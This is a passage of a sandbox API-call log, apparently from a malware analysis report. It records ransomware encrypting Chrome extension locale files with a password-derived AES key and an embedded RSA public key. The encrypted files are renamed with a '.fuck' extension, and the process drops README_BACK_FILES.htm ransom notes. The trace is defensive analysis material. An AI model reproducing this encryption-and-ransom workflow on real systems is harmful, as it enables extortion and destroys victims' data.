Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0259.001] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0259.002] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.gsg")) returned 1 [0259.003] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.fuck")) returned 1 [0259.004] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.004] CryptDestroyKey (hKey=0x2e7c380) returned 1 [0259.004] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.004] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.004] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.004] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0259.004] AreFileApisANSI () returned 1 [0259.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.004] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.005] GetFileType (hFile=0x5d64) returned 0x1 [0259.005] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.006] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.006] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.007] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.007] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.007] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.007] GetLastError () returned 0x0 [0259.007] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json")) returned 0x20 [0259.007] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0259.007] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.008] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.008] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.009] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.011] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.011] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.011] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.011] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c780) returned 1 [0259.011] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.011] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.011] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6cc40) returned 1 [0259.011] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6cc40, dwCertEncodingType=0x1, pInfo=0x2e26890*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e268c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e268c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c4c0) returned 1 [0259.011] CryptEncrypt (in: hKey=0x2e7c4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.011] CryptEncrypt (in: hKey=0x2e7c4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c4d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c4d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.011] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6c4d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c4d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.012] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x36b, lpOverlapped=0x0) returned 1 [0259.015] CryptEncrypt (in: hKey=0x2e7c780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x36b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x370) returned 1 [0259.016] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x370, lpOverlapped=0x0) returned 1 [0259.026] CloseHandle (hObject=0x5d5c) returned 1 [0259.026] CloseHandle (hObject=0x5d60) returned 1 [0259.026] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0259.028] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0259.029] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.gsg")) returned 1 [0259.030] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\messages.json.fuck")) returned 1 [0259.030] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.031] CryptDestroyKey (hKey=0x2e7c780) returned 1 [0259.031] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.031] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.031] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.031] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0259.031] AreFileApisANSI () returned 1 [0259.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.031] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.032] GetFileType (hFile=0x5d64) returned 0x1 [0259.032] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.033] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.033] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.033] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.033] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.033] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.033] GetLastError () returned 0x0 [0259.033] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json")) returned 0x20 [0259.033] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json", dwFileAttributes=0x80) returned 1 [0259.034] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.034] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.035] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.035] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.037] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.037] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.037] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.037] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c700) returned 1 [0259.037] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.037] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.037] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6ccc8) returned 1 [0259.037] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6ccc8, dwCertEncodingType=0x1, pInfo=0x2e25fa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25fd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25fd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c380) returned 1 [0259.038] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.038] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6cf70*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6cf70*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.038] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6cf70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6cf70*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.039] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x269, lpOverlapped=0x0) returned 1 [0259.040] CryptEncrypt (in: hKey=0x2e7c700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x269, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x270) returned 1 [0259.040] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x270, lpOverlapped=0x0) returned 1 [0259.045] CloseHandle (hObject=0x5d60) returned 1 [0259.046] CloseHandle (hObject=0x5d5c) returned 1 [0259.046] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), bFailIfExists=0) returned 1 [0259.048] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json", dwFileAttributes=0x0) returned 1 [0259.049] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.gsg")) returned 1 [0259.050] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.fuck")) returned 1 [0259.051] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.051] CryptDestroyKey (hKey=0x2e7c700) returned 1 [0259.051] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.052] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.052] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.052] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\readme_back_files.htm")) returned 0xffffffff [0259.052] AreFileApisANSI () returned 1 [0259.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.052] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\README_BACK_FILES.htm" (normalized: 